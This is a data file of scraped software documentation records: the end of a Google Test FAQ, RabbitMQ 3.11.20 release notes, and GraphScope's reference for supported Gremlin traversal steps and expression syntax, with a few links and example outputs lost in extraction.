`UNICODE` mode as well. But maybe you think that writing all those main() functions is too much work? 
We agree with you completely, and that's why Google Test provides a basic implementation of main(). If it fits your needs, then just link your test with the gtest_main library and you are good to go. NOTE: `ParseGUnitFlags()` is deprecated in favor of `InitGoogleTest()`. Google Test is designed to be thread-safe. The implementation is thread-safe on systems where the `pthreads` library is available. It is currently unsafe to use Google Test assertions from two threads concurrently on other systems (e.g. Windows). In most tests this is not an issue as usually the assertions are done in the main thread. If you want to help, you can volunteer to implement the necessary synchronization primitives in `gtest-port.h` for your platform." } ]
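To make the gtest_main note above concrete, here is a minimal sketch of a test file that relies on the main() supplied by gtest_main; the file name and build command in the comments are illustrative assumptions, not part of the original text.

```c++
// minimal_test.cc -- relies on the main() provided by gtest_main, so no
// main() function is written here. An illustrative build line might be:
//   g++ -std=c++14 minimal_test.cc -lgtest_main -lgtest -lpthread -o minimal_test
#include "gtest/gtest.h"

// gtest_main's main() calls ::testing::InitGoogleTest() and RUN_ALL_TESTS()
// on our behalf; we only define ordinary tests.
TEST(MinimalTest, BasicAssertions) {
  EXPECT_STRNE("hello", "world");  // non-fatal assertion on C strings
  ASSERT_EQ(7 * 6, 42);            // fatal assertion on integers
}
```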
{ "category": "App Definition and Development", "file_name": "3.11.20.md", "project_name": "RabbitMQ", "subcategory": "Streaming & Messaging" }
[ { "data": "RabbitMQ `3.11.20` is a maintenance release in the `3.11.x` . Please refer to the upgrade section from if upgrading from a version prior to 3.11.0. This release requires Erlang 25 and supports Erlang versions up to `25.3.x`. has more details on Erlang version requirements for RabbitMQ. As of 3.11.0, RabbitMQ requires Erlang 25. Nodes will fail to start on older Erlang releases. Erlang 25 as our new baseline means much improved performance on ARM64 architectures, across all architectures, and the most recent TLS 1.3 implementation available to all RabbitMQ 3.11 users. Release notes can be found on GitHub at . Fixed a potential resource leak in at-least-once dead lettering from quorum queues. GitHub issue: A new command, `rabbitmqctl deactivatefreediskspacemonitoring`, can be used to (temporarily or permanently) disable free disk space monitoring on a node. To re-activate it, use `rabbitmqctl activatefreediskspacemonitoring`. GitHub issue: AMQP 1.0 clients that try to publish in a way that results in the message not being routed anywhere are now notified with a more sensible settlement status. GitHub issue: Prometheus scraping API endpoints now support optional authentication. Contributed by @SimonUnge (AWS). GitHub issue: The plugin now filters out values that are `undefined` or `NaN`, simply excluding them from the API endpoint response. Previously, if a metric was not computed for any reason (e.g. free disk space monitor was disabled on the node), its value could end up being rendered as `undefined` or `NaN`, two values that Prometheus scrapers cannot handle (for numerical types such as gauges). GitHub issue: It was not possible to close a table column selection pane on screens that had little vertical space. Contributed by @Antsthebul. GitHub issue: `ra` was upgraded to To obtain source code of the entire distribution, please download the archive named `rabbitmq-server-3.11.20.tar.xz` instead of the source tarball produced by GitHub." } ]
{ "category": "App Definition and Development", "file_name": "supported_gremlin_steps.md", "project_name": "GraphScope", "subcategory": "Database" }
[ { "data": "1. 3. 5. 7. 9. 11. 1. 3. This documentation guides you how to work with the graph traversal language in GraphScope. On the one hand we retain the original syntax of most steps from the standard Gremlin, on the other hand the usages of some steps are further extended to denote more complex situations in real-world scenarios. We retain the original syntax of the following steps from the standard Gremlin. The V()-step is meant to iterate over all vertices from the graph. Moreover, `vertexIds` can be injected into the traversal to select a subset of vertices. Parameters: </br> vertexIds - to select a subset of vertices from the graph, each id is of integer type. ```bash g.V() g.V(1) g.V(1,2,3) ``` The E()-step is meant to iterate over all edges from the graph. Moreover, `edgeIds` can be injected into the traversal to select a subset of edges. Parameters: </br> edgeIds - to select a subset of edges from the graph, each id is of integer type. ```bash g.E() g.E(1) g.E(1,2,3) ``` Map the vertex to its outgoing incident edges given the edge labels. Parameters: </br> edgeLabels - the edge labels to traverse. ```bash g.V().outE(\"knows\") g.V().outE(\"knows\", \"created\") ``` Map the vertex to its incoming incident edges given the edge labels. Parameters: </br> edgeLabels - the edge labels to traverse. ```bash g.V().inE(\"knows\") g.V().inE(\"knows\", \"created\") ``` Map the vertex to its incident edges given the edge labels. Parameters: </br> edgeLabels - the edge labels to traverse. ```bash g.V().bothE(\"knows\") g.V().bothE(\"knows\", \"created\") ``` Map the vertex to its outgoing adjacent vertices given the edge labels. Parameters: </br> edgeLabels - the edge labels to traverse. ```bash g.V().out(\"knows\") g.V().out(\"knows\", \"created\") ``` Map the vertex to its incoming adjacent vertices given the edge labels. Parameters: </br> edgeLabels - the edge labels to traverse. ```bash g.V().in(\"knows\") g.V().in(\"knows\", \"created\") ``` Map the vertex to its adjacent vertices given the edge labels. Parameters: </br> edgeLabels - the edge labels to traverse. ```bash g.V().both(\"knows\") g.V().both(\"knows\", \"created\") ``` Map the edge to its outgoing/tail incident vertex. ```bash g.V().inE().outV() # = g.V().in() ``` Map the edge to its incoming/head incident vertex. ```bash g.V().outE().inV() # = g.V().out() ``` Map the edge to the incident vertex that was not just traversed from in the path history. ```bash g.V().bothE().otherV() # = g.V().both() ``` Map the edge to its incident vertices. ```bash g.V().outE().bothV() # both endpoints of the outgoing edges ``` The hasId()-step is meant to filter graph elements based on their identifiers. Parameters: </br> elementIds - identifiers of the elements. ```bash g.V().hasId(1) # = g.V(1) g.V().hasId(1,2,3) # = g.V(1,2,3) ``` The hasLabel()-step is meant to filter graph elements based on their labels. Parameters: </br> labels - labels of the elements. ```bash g.V().hasLabel(\"person\") g.V().hasLabel(\"person\", \"software\") ``` The has()-step is meant to filter graph elements by applying predicates on their properties. Parameters: </br> propertyKey - the key of the property to filter on for existence. ```bash g.V().has(\"name\") # find vertices containing property `name` ``` propertyKey - the key of the property to filter on, </br> value - the value to compare the accessor value to for equality. 
```bash g.V().has(\"age\", 10) g.V().has(\"name\", \"marko\") g.E().has(\"weight\"," }, { "data": "``` propertyKey - the key of the property to filter on, </br> predicate - the filter to apply to the key's value. ```bash g.V().has(\"age\", P.eq(10)) g.V().has(\"age\", P.neq(10)) g.V().has(\"age\", P.gt(10)) g.V().has(\"age\", P.lt(10)) g.V().has(\"age\", P.gte(10)) g.V().has(\"age\", P.lte(10)) g.V().has(\"age\", P.within([10, 20])) g.V().has(\"age\", P.without([10, 20])) g.V().has(\"age\", P.inside(10, 20)) g.V().has(\"age\", P.outside(10, 20)) g.V().has(\"age\", P.not(P.eq(10))) # = g.V().has(\"age\", P.neq(10)) g.V().has(\"name\", TextP.startingWith(\"mar\")) g.V().has(\"name\", TextP.endingWith(\"rko\")) g.V().has(\"name\", TextP.containing(\"ark\")) g.V().has(\"name\", TextP.notStartingWith(\"mar\")) g.V().has(\"name\", TextP.notEndingWith(\"rko\")) g.V().has(\"name\", TextP.notContaining(\"ark\")) ``` label - the label of the Element, </br> propertyKey - the key of the property to filter on, </br> value - the value to compare the accessor value to for equality. ```bash g.V().has(\"person\", \"id\", 1) # = g.V().hasLabel(\"person\").has(\"id\", 1) ``` label - the label of the Element, </br> propertyKey - the key of the property to filter on, </br> predicate - the filter to apply to the key's value. ```bash g.V().has(\"person\", \"age\", P.eq(10)) # = g.V().hasLabel(\"person\").has(\"age\", P.eq(10)) ``` The hasNot()-step is meant to filter graph elements based on the non-existence of properties. Parameters: </br> propertyKey - the key of the property to filter on for non-existence. ```bash g.V().hasNot(\"age\") # find vertices not-containing property `age` ``` The is()-step is meant to filter the object if it is unequal to the provided value or fails the provided predicate. Parameters: </br> value - the value that the object must equal. ```bash g.V().out().count().is(1) ``` predicate - the filter to apply. ```bash g.V().out().count().is(P.eq(1)) ``` The where(traversal)-step is meant to filter the current object by applying it to the nested traversal. Parameters: </br> whereTraversal - the traversal to apply. ```bash g.V().where(out().count()) g.V().where(out().count().is(gt(0))) ``` The where(predicate)-step is meant to filter the traverser based on the predicate acting on different tags. Parameters: </br> predicate - the predicate containing another tag to apply. ```bash g.V().as(\"a\").out().out().where(P.eq(\"a\")) ``` startKey - the tag containing the object to filter, </br> predicate - the predicate containing another tag to apply. ```bash g.V().as(\"a\").out().out().as(\"b\").where(\"b\", P.eq(\"a\")) ``` The by() can be applied to a number of different steps to alter their behaviors. Here are some usages of the modulated by()-step after a where-step: empty - this form is essentially an identity() modulation. ```bash g.V().as(\"a\").out().out().as(\"b\").where(\"b\", P.eq(\"a\")).by() ``` propertyKey - filter by the property value of the specified tag given the property key. ```bash g.V().as(\"a\").out().out().as(\"b\").where(\"b\", P.eq(\"a\")).by(\"name\") ``` traversal - filter by the computed value after applying the specified tag to the nested traversal. ```bash g.V().as(\"a\").out().out().as(\"b\").where(\"b\", P.eq(\"a\")).by(out().count()) ``` The not()-step is opposite to the where()-step and removes objects from the traversal stream when the traversal provided as an argument does not return any objects. Parameters: </br> notTraversal - the traversal to filter by. 
```bash g.V().not(out().count()) g.V().not(out().count().is(gt(0))) ``` Remove all duplicates in the traversal stream up to this point. Parameters: dedupLabels - composition of the given labels determines de-duplication. No labels implies current object. ```bash g.V().dedup() g.V().as(\"a\").out().dedup(\"a\") # dedup by entry `a` g.V().as(\"a\").out().as(\"b\").dedup(\"a\", \"b\") # dedup by the composition of entry `a` and `b` ``` Usages of the modulated by()-step: </br> propertyKey - dedup by the property value of the current object or the specified tag given the property key. ```bash g.V().dedup().by(\"name\") g.V().as(\"a\").out().dedup(\"a\").by(\"name\") ``` token - dedup by the token value of the current object or the specified tag. ```bash g.V().dedup().by(T.id) g.V().dedup().by(T.label) g.V().as(\"a\").out().dedup(\"a\").by(T.id) g.V().as(\"a\").out().dedup(\"a\").by(T.label) ``` traversal - dedup by the computed value after applying the current object or the specified tag to the nested traversal. ```bash g.V().dedup().by(out().count())" }, { "data": "``` The id()-step is meant to map the graph element to its identifier. ```bash g.V().id() ``` The label()-step is meant to map the graph element to its label. ```bash g.V().label() ``` The constant()-step is meant to map any object to a fixed object value. Parameters: </br> value - a fixed object value. ```bash g.V().constant(1) g.V().constant(\"marko\") g.V().constant(1.0) ``` The valueMap()-step is meant to map the graph element to a map of the property entries according to their actual properties. If no property keys are provided, then all property values are retrieved. Parameters: </br> propertyKeys - the properties to retrieve. ```bash g.V().valueMap() g.V().valueMap(\"name\") g.V().valueMap(\"name\", \"age\") ``` The values()-step is meant to map the graph element to the values of the associated properties given the provide property keys. Here we just allow only one property key as the argument to the `values()` to implement the step as a map instead of a flat-map, which may be a little different from the standard Gremlin. Parameters: </br> propertyKey - the property to retrieve its value from. ```bash g.V().values(\"name\") ``` The elementMap()-step is meant to map the graph element to a map of T.id, T.label and the property values according to the given keys. If no property keys are provided, then all property values are retrieved. ``` Parameters: </br> propertyKeys - the properties to retrieve. ```bash g.V().elementMap() g.V().elementMap(\"name\") g.V().elementMap(\"name\", \"age\") ``` The select()-step is meant to map the traverser to the object specified by the selectKey or to a map projection of sideEffect values. Parameters: </br> selectKeys - the keys to project. ```bash g.V().as(\"a\").select(\"a\") g.V().as(\"a\").out().as(\"b\").select(\"a\", \"b\") ``` Usages of the modulated by()-step: </br> empty - an identity() modulation. ```bash g.V().as(\"a\").select(\"a\").by() g.V().as(\"a\").out().as(\"b\").select(\"a\", \"b\").by().by() ``` token - project the token value of the specified tag. ```bash g.V().as(\"a\").select(\"a\").by(T.id) g.V().as(\"a\").select(\"a\").by(T.label) ``` propertyKey - project the property value of the specified tag given the property key. ```bash g.V().as(\"a\").select(\"a\").by(\"name\") ``` traversal - project the computed value after applying the specified tag to the nested traversal. 
```bash g.V().as(\"a\").select(\"a\").by(valueMap(\"name\", \"id\")) g.V().as(\"a\").select(\"a\").by(out().count()) ``` Count the number of traverser(s) up to this point. ```bash g.V().count() ``` Rolls up objects in the stream into an aggregate list. ```bash g.V().limit(10).fold() ``` Sum the traverser values up to this point. ```bash g.V().values(\"age\").sum() ``` Determines the minimum value in the stream. ```bash g.V().values(\"age\").min() ``` Determines the maximum value in the stream. ```bash g.V().values(\"age\").max() ``` Compute the average value in the stream. ```bash g.V().values(\"age\").mean() ``` Organize objects in the stream into a Map. Calls to group() are typically accompanied with by() modulators which help specify how the grouping should occur. Usages of the key by()-step: empty - group the elements in the stream by the current value. ```bash g.V().group().by() # = g.V().group() ``` propertyKey - group the elements in the stream by the property value of the current object given the property key. ```bash g.V().group().by(\"name\") ``` traversal - group the elements in the stream by the computed value after applying the current object to the nested traversal. ```bash g.V().group().by(values(\"name\")) # = g.V().group().by(\"name\") g.V().group().by(out().count()) ``` Usages of the value by()-step: empty - fold elements in each group into a list, which is a default behavior. ```bash g.V().group().by().by() # = g.V().group() ``` propertyKey - for each element in the group, get their property values according to the given" }, { "data": "```bash g.V().group().by().by(\"name\") ``` aggregateFunc - aggregate function to apply in each group. ```bash g.V().group().by().by(count()) g.V().group().by().by(fold()) g.V().group().by().by(values(\"name\").fold()) # = g.V().group().by().by(\"name\") g.V().group().by().by(values(\"age\").sum()) g.V().group().by().by(values(\"age\").min()) g.V().group().by().by(values(\"age\").max()) g.V().group().by().by(values(\"age\").mean()) g.V().group().by().by(dedup().count()) g.V().group().by().by(dedup().fold()) ``` Counts the number of times a particular objects has been part of a traversal, returning a map where the object is the key and the value is the count. Usages of the key by()-step: empty - group the elements in the stream by the current value. ```bash g.V().groupCount().by() # = g.V().groupCount() ``` propertyKey - group the elements in the stream by the property value of the current object given the property key. ```bash g.V().groupCount().by(\"name\") ``` traversal - group the elements in the stream by the computed value after applying the current object to the nested traversal. ```bash g.V().groupCount().by(values(\"name\")) # = g.V().groupCount().by(\"name\") g.V().groupCount().by(out().count()) ``` Order all the objects in the traversal up to this point and then emit them one-by-one in their ordered sequence. Usages of the modulated by()-step: </br> empty - order by the current object in ascending order, which is a default behavior. ```bash g.V().order().by() # = g.V().order() ``` order - the comparator to apply typically for some order (asc | desc | shuffle). ```bash g.V().order().by(Order.asc) # = g.V().order() g.V().order().by(Order.desc) ``` propertyKey - order by the property value of the current object given the property key. ```bash g.V().order().by(\"name\") # default order is asc g.V().order().by(\"age\") ``` traversal - order by the computed value after applying the current object to the nested traversal. 
```bash g.V().order().by(out().count()) # default order is asc ``` propertyKey - order by the property value of the current object given the property key, </br> order - the comparator to apply typically for some order. ```bash g.V().order().by(\"name\", Order.desc) ``` traversal - order by the computed value after applying the current object to the nested traversal, </br> order - the comparator to apply typically for some order. ```bash g.V().order().by(out().count(), Order.desc) ``` Filter the objects in the traversal by the number of them to pass through the stream, where only the first n objects are allowed as defined by the limit argument. Parameters: </br> limit - the number at which to end the stream. ```bash g.V().limit(10) ``` Filter the object in the stream given a biased coin toss. Parameters: </br> probability - the probability that the object will pass through. ```bash g.V().coin(0.2) # range is [0.0, 1.0] g.V().out().coin(0.2) ``` Generate a certain number of sample results. Parameters: </br> number - allow specified number of objects to pass through the stream. ```bash g.V().sample(10) g.V().out().sample(10) ``` Merges the results of an arbitrary number of traversals. Parameters: </br> unionTraversals - the traversals to merge. ```bash g.V().union(out(), out().out()) ``` The match()-step provides a declarative form of graph patterns to match with. With match(), the user provides a collection of \"sentences,\" called patterns, that have variables defined that must hold true throughout the duration of the match(). For most of the complex graph patterns, it is usually much easier to express via match() than with single-path traversals. Parameters: </br> matchSentences - define a collection of patterns. Each pattern consists of a start tag, a serials of Gremlin steps (binders) and an end tag. Supported binders within a pattern: </br> Expand: in()/out()/both(), inE()/outE()/bothE(), inV()/outV()/otherV/bothV PathExpand Filter: has()/not()/where ```bash g.V().match(.as(\"a\").out().as(\"b\"), .as(\"b\").out().as(\"c\")) g.V().match(.as(\"a\").out().out().as(\"b\")," }, { "data": "g.V().match(.as(\"a\").out().out().as(\"b\"), not(.as(\"a\").out().as(\"b\"))) g.V().match(.as(\"a\").out().has(\"name\", \"marko\").as(\"b\"), .as(\"b\").out().as(\"c\")) ``` An edge-induced subgraph extracted from the original graph. Parameters: </br> graphName - the name of the side-effect key that will hold the subgraph. ```bash g.E().subgraph(\"all\") g.V().has('name', \"marko\").outE(\"knows\").subgraph(\"partial\") ``` The identity()-step maps the current object to itself. ```bash g.V().identity().values(\"id\") g.V().hasLabel(\"person\").as(\"a\").identity().values(\"id\") g.V().has(\"name\", \"marko\").union(identity(), out()).values(\"id\") ``` The unfold()-step unrolls an iterator, iterable or map into a linear form. ```bash g.V().fold().unfold().values(\"id\") g.V().fold().as(\"a\").unfold().values(\"id\") g.V().has(\"name\", \"marko\").fold().as(\"a\").select(\"a\").unfold().values(\"id\") g.V().out(\"1..3\", \"knows\").with('RESULTOPT', 'ALLV').unfold() ``` The following steps are extended to denote more complex situations. In Graph querying, expanding a multiple-hops path from a starting point is called `PathExpand`, which is commonly used in graph scenarios. In addition, there are different requirements for expanding strategies in different scenarios, i.e. it is required to output a simple path or all vertices explored along the expanding path. 
We introduce the with()-step to configure the corresponding behaviors of the `PathExpand`-step. Expand a multiple-hops path along the outgoing edges, which length is within the given range. Parameters: </br> lengthRange - the lower and the upper bounds of the path length, </br> edgeLabels - the edge labels to traverse. Usages of the with()-step: </br> keyValuePair - the options to configure the corresponding behaviors of the `PathExpand`-step. ```bash g.V().out(\"1..10\").with('PATHOPT', 'ARBITRARY').with('RESULTOPT', 'END_V') g.V().out(\"1..10\").with('PATHOPT', 'ARBITRARY').with('RESULTOPT', 'ALLVE') g.V().out(\"1..10\").with('PATHOPT', 'SIMPLE').with('RESULTOPT', 'ALL_V') g.V().out(\"1..10\") g.V().out(\"1..10\", \"knows\") g.V().out(\"1..10\", \"knows\", \"created\") g.V().out(\"1..10\").with('RESULTOPT', 'ALLV').values(\"name\") ``` Running Example: ```bash gremlin> g.V().out(\"1..3\", \"knows\").with('RESULTOPT', 'ALLV') ==>[v[1], v[2]] ==>[v[1], v[4]] gremlin> g.V().out(\"1..3\", \"knows\").with('RESULTOPT', 'ALLV_E') ==>, v[2]] ==>, v[4]] gremlin> g.V().out(\"1..3\", \"knows\").with('RESULTOPT', 'ENDV').endV() ==>v[2] ==>v[4] gremlin> g.V().out(\"1..3\", \"knows\").with('RESULTOPT', 'ALLV').values(\"name\") ==>[marko, vadas] ==>[marko, josh] gremlin> g.V().out(\"1..3\", \"knows\").with('RESULTOPT', 'ALLV').valueMap(\"id\",\"name\") ==>{id=[[1, 2]], name=[[marko, vadas]]} ==>{id=[[1, 4]], name=[[marko, josh]]} ``` Expand a multiple-hops path along the incoming edges, which length is within the given range. ```bash g.V().in(\"1..10\").with('PATHOPT', 'ARBITRARY').with('RESULTOPT', 'END_V') ``` Running Example: ```bash gremlin> g.V().in(\"1..3\", \"knows\").with('RESULTOPT', 'ALLV') ==>[v[2], v[1]] ==>[v[4], v[1]] gremlin> g.V().in(\"1..3\", \"knows\").with('RESULTOPT', 'ALLV_E') ==>, v[1]] ==>, v[1]] gremlin> g.V().in(\"1..3\", \"knows\").with('RESULTOPT', 'ENDV').endV() ==>v[1] ==>v[1] ``` Expand a multiple-hops path along the incident edges, which length is within the given range. ```bash g.V().both(\"1..10\").with('PATHOPT', 'ARBITRARY').with('RESULTOPT', 'END_V') ``` Running Example: ```bash gremlin> g.V().both(\"1..3\", \"knows\").with('RESULTOPT', 'ALLV') ==>[v[2], v[1]] ==>[v[1], v[2]] ==>[v[1], v[4]] ==>[v[2], v[1], v[2]] ==>[v[2], v[1], v[4]] ==>[v[4], v[1]] ==>[v[1], v[2], v[1]] ==>[v[1], v[4], v[1]] ==>[v[4], v[1], v[2]] ==>[v[4], v[1], v[4]] gremlin> g.V().both(\"1..3\", \"knows\").with('RESULTOPT', 'ALLV_E') ==>, v[1]] ==>, v[1]] ==>, v[2]] ==>, v[4]] ==>, v, v[2]] ==>, v, v[4]] ==>, v, v[2]] ==>, v, v[4]] ==>, v, v[1]] ==>, v, v[1]] gremlin> g.V().both(\"1..3\", \"knows\").with('RESULTOPT', 'ENDV').endV() ==>v[1] ==>v[1] ==>v[2] ==>v[4] ==>v[2] ==>v[1] ==>v[1] ==>v[4] ==>v[2] ==>v[4] ``` By default, all kept vertices are stored in a path collection which can be unfolded by a `endV()`-step. ```bash g.V().out(\"1..10\").with('RESULTOPT', 'ALLV') g.V().out(\"1..10\").with('RESULTOPT', 'ALLV').endV() ``` Expressions, expressed via the `expr()` syntactic sugar, have been introduced to facilitate writing expressions directly within steps such as `select()`, `project()`, `where()`, and `group()`. This update is part of an ongoing effort to standardize Gremlin's expression syntax, making it more aligned with . The updated syntax, effective from version 0.27.0, streamlines user operations and enhances readability. Below, we detail the updated syntax definitions and point out key distinctions from the syntax used prior to version 0.26.0. 
Literal: Category | Syntax | - string | \"marko\" boolean | true, false integer | 1, 2, 3 long | 1l, 1L float | 1.0f," }, { "data": "double | 1.0, 1.0d, 1.0D list | [\"marko\", \"vadas\"], [true, false], [1, 2], [1L, 2L], [1.0F, 2.0F], [1.0, 2.0] Variable: Category | Description | Before 0.26.0 | Since 0.27.0 | - | - | - current | the current entry | @ | _ current property | the property value of the current entry | @.name | _.name tag | the specified tag | @a | a tag property | the property value of the specified tag | @a.name | a.name Operator: Category | Operation (Case-Insensitive) | Description | Before 0.26.0 | Since 0.27.0 | - | - | - | - logical | = | equal | @.name == \"marko\" | _.name = \"marko\" logical | <> | not equal | @.name != \"marko\" | _.name != \"marko\" logical | > | greater than | @.age > 10 | _.age > 10 logical | < | less than | @.age < 10 | _.age < 10 logical | >= | greater than or equal | @.age >= 10 | _.age >= 10 logical | <= | less than or equal | @.age <= 10 | _.age <= 10 logical | NOT | negate the logical expression | ! (@.name == \"marko\") | NOT _.name = \"marko\" logical | AND | connect two logical expressions with AND | @.name == \"marko\" && @.age > 10 | .name = \"marko\" AND .age > 10 logical | OR | connect two logical expressions with OR | @.name == \"marko\" \\|\\| @.age > 10 | .name = \"marko\" OR .age > 10 logical | IN | whether the value of the current entry is in the given list | @.name WITHIN [\"marko\", \"vadas\"] | _.name IN [\"marko\", \"vadas\"] logical | IS NULL | whether the value of the current entry ISNULL | @.age IS NULL | _.age IS NULL logical | IS NOT NULL | whether the value of the current entry IS NOT NULL | ! (@.age ISNULL) | _.age IS NOT NULL arithmetical | + | addition | @.age + 10 | _.age + 10 arithmetical | - | subtraction | @.age - 10 | _.age - 10 arithmetical | | multiplication | @.age 10 | _.age * 10 arithmetical | / | division | @.age / 10 | _.age / 10 arithmetical | % | modulo | @.age % 10 | _.age % 10 arithmetical | POWER | exponentiation | @.age ^^ 3 | POWER(_.age, 3) temporal arithmetical | + | Add a duration to a temporal type | unsupported | _.creationDate + duration({years: 1}) temporal arithmetical | - | Subtract a duration from a temporal type | unsupported | _.creationDate - duration({years: 1}) temporal arithmetical | - | Subtract two temporal types, returning a duration in milliseconds | unsupported | a.creationDate -" }, { "data": "temporal arithmetical | + | Add two durations | unsupported | duration({years: 1}) + duration({months: 2}) temporal arithmetical | - | Subtract two durations | unsupported | duration({years: 1}) - duration({months: 2}) temporal arithmetical | | Multiply a duration by a numeric value | unsupported | duration({years: 1}) 2 temporal arithmetical | / | Divide a duration by a numeric value | unsupported | duration({years: 1}) / 2, (a.creationDate - b.creationDate) / 1000 bitwise | & | bitwise AND | @.age & 2 | _.age & 2 bitwise | \\| | bitwise OR | @.age \\| 2 | _.age \\| 2 bitwise | ^ | bitwise XOR | @.age ^ 2 | _.age ^ 2 bit shift | << | left shift | @.age << 2 | _.age << 2 bit shift | >> | right shift | @.age >> 2 | _.age >> 2 string regex match | STARTS WITH | whether the string starts with the given prefix | @.name STARTSWITH \"ma\" | _.name STARTS WITH \"ma\" string regex match | NOT STARTS WITH | whether the string does not start with the given prefix | ! 
(@.name STARTSWITH \"ma\") | NOT _.name STARTS WITH \"ma\" string regex match | ENDS WITH | whether the string ends with the given suffix | @.name ENDSWITH \"ko\" | _.name ENDS WITH \"ko\" string regex match | NOT ENDS WITH | whether the string does not end with the given suffix | ! (@.name ENDSWITH \"ko\") | NOT _.name ENDS WITH \"ko\" string regex match | CONTAINS | whether the string contains the given substring | \"ar\" WITHIN @.name | _.name CONTAINS \"ar\" string regex match | NOT CONTAINS | whether the string does not contain the given substring | \"ar\" WITHOUT @.name | NOT _.name CONTAINS \"ar\" Function: Category | Function (Case-Insensitive) | Description | Before 0.26.0 | Since 0.27.0 | - | - | - | - aggregate | COUNT | count the number of the elements | unsupported | COUNT(_.age) aggregate | SUM | sum the values of the elements | unsupported | SUM(_.age) aggregate | MIN | find the minimum value of the elements | unsupported | MIN(_.age) aggregate | MAX | find the maximum value of the elements | unsupported | MAX(_.age) aggregate | AVG | calculate the average value of the elements | unsupported | AVG(_.age) aggregate | COLLECT | fold the elements into a list | unsupported | COLLECT(_.age) aggregate | HEAD(COLLECT()) | find the first value of the elements | unsupported | HEAD(COLLECT(_.age)) other | LABELS | get the labels of the specified tag which is a vertex | @a.~label | LABELS(a) other | elementId | get a vertex or an edge identifier, unique by an object type and a database | @a.~id | elementId(a) other | TYPE | get the type of the specified tag which is an edge | @a.~label |TYPE(a) other | LENGTH | get the length of the specified tag which is a path | @a.~len | LENGTH(a) Expression in project or filter: Category | Description | Before 0.26.0 | Since 0.27.0 | - | - | - filter | filter the current traverser by the expression | where(expr(\"@.name == \\\\\"marko\\\\\"\")) | where(expr(_.name = \"marko\")) project | project the current traverser to the value of the expression | select(expr(\"@.name\")) | select(expr(_.name)) Here we provide the precedence of the operators mentioned above, which is also based on the SQL standard. 
Precedence | Operator | Description | Associativity | | | 1 | `()`, `.`, power()," }, { "data": "| Parentheses, Member access, Function call | Left-to-right 2 | -a, +a | Unary minus, Unary plus | Right-to-left 3 | `*`, `/`, `%` | Multiplication, Division, Modulus | Left-to-right 4 | `+`, `-`, `&`, `\\|`, `^`, `<<`, `>>` | Addition, Subtraction, Bitwise AND, Bitwise OR, Bitwise XOR, Left shift, Right shift | Left-to-right 5 | STARTS WITH, ENDS WITH, CONTAINS, IN | String regex match, Collection membership | Left-to-right 6 | `=`, `<>`, `<`, `<=`, `>`, `>=` | Comparison | Left-to-right 7 | IS NULL, IS NOT NULL | Nullness check | Left-to-right 8 | NOT | Logical NOT | Right-to-left 9 | AND | Logical AND | Left-to-right 10 | OR | Logical OR | Left-to-right ```bash gremlin> :submit g.V().where(expr(_.name = \"marko\")) ==>v[1] gremlin> :submit g.V().as(\"a\").where(expr(a.name = \"marko\" OR a.age > 10)) ==>v[6] ==>v[1] ==>v[2] ==>v[4] gremlin> :submit g.V().as(\"a\").where(expr(a.age IS NULL)).values(\"name\") ==>lop ==>ripple gremlin> :submit g.V().as(\"a\").where(expr(a.age IS NOT NULL)).values(\"name\") ==>vadas ==>josh ==>marko ==>peter gremlin> :submit g.V().as(\"a\").where(expr(a.name STARTS WITH \"ma\")) ==>v[1] gremlin> :submit g.V().select(expr(_.name)) ==>vadas ==>josh ==>lop ==>ripple ==>marko ==>peter gremlin> :submit g.V().hasLabel(\"person\").select(expr(_.age ^ 1)) ==>26 ==>28 ==>33 ==>34 gremlin> :submit g.V().hasLabel(\"person\").select(expr(POWER(_.age, 2))) ==>729 ==>1024 ==>1225 ==>841 ``` The group()-step in standard Gremlin has limited capabilities (i.e. grouping can only be performed based on a single key, and only one aggregate calculation can be applied in each group), which cannot be applied to the requirements of performing group calculations on multiple keys or values; Therefore, we further extend the capabilities of the group()-step, allowing multiple variables to be set and different aliases to be configured in key by()-step and value by()-step respectively. Usages of the key by()-step: ```bash group().by(values(\"name\").as(\"k1\"), values(\"age\").as(\"k2\")) group().by(out().count().as(\"k1\"), values(\"name\").as(\"k2\")) ``` Usages of the value by()-step: ```bash group().by(\"name\").by(count().as(\"v1\"), values(\"age\").sum().as(\"v2\")) ``` Running Example: ```bash gremlin> g.V().hasLabel(\"person\").group().by(values(\"name\").as(\"k1\"), values(\"age\").as(\"k2\")) ==>{[josh, 32]=[v[4]], [vadas, 27]=[v[2]], [peter, 35]=[v[6]], [marko, 29]=[v[1]]} gremlin> g.V().hasLabel(\"person\").group().by(out().count().as(\"k1\"), values(\"name\").as(\"k2\")) ==>{[2, josh]=[v[4]], [0, vadas]=[v[2]], [3, marko]=[v[1]], [1, peter]=[v[6]]} gremlin> g.V().hasLabel(\"person\").group().by(\"name\").by(count().as(\"v1\"), values(\"age\").sum().as(\"v2\")) ==>{marko=[1, 29], peter=[1, 35], josh=[1, 32], vadas=[1, 27]} gremlin> g.V().hasLabel(\"person\").group().by(\"name\").by(count().as(\"v1\"), values(\"age\").sum().as(\"v2\")).select(\"v1\", \"v2\") ==>{v1=1, v2=35} ==>{v1=1, v2=32} ==>{v1=1, v2=27} ==>{v1=1, v2=29} ``` Here we list steps which are unsupported yet. Some will be supported in the near future while others will remain unsupported for some reasons. The following steps will be supported in the near future. <!--#### identity() Map the current object to itself. ```bash g.V().identity() g.V().union(identity(), out().out()) ```<--> Map the traverser to its path history. 
```bash g.V().out().out().path() g.V().as(\"a\").out().out().select(\"a\").by(\"name\").path() ``` Unrolls a iterator, iterable or map into a linear form. ```bash g.V().fold().unfold() ``` ```bash g.V().fold().count(local) g.V().values('age').fold().sum(local) ``` The following steps will remain unsupported. repeat().times() </br> In graph pattern scenarios, `repeat().times()` can be replaced equivalently by the `PathExpand`-step. ```bash g.V().repeat(out(\"knows\")).times(2) g.V().repeat(out(\"knows\")).emit().times(2) g.V().repeat(out(\"knows\").simplePath()).times(2) g.V().repeat(out(\"knows\").simplePath()).emit().times(2) ``` repeat().until() </br> It is a imperative syntax, not declarative. The properties()-step retrieves and then unfolds properties from a graph element. The valueMap()-step can reflect all the properties of each graph element in a map form, which could be much more clear than the results of the properties()-step for the latter could mix up the properties of all the graph elements in the same output. It is required to maintain global variables for `SideEffect`-step during actual execution, which is hard to implement in distributed scenarios. i.e. group(\"a\") groupCount(\"a\") aggregate(\"a\") sack() Currently, we only support the operations of merging multiple streams into one. The following splitting operations are unsupported: branch() choose()" } ]
{ "category": "App Definition and Development", "file_name": "flink-1.15.md", "project_name": "Flink", "subcategory": "Streaming & Messaging" }
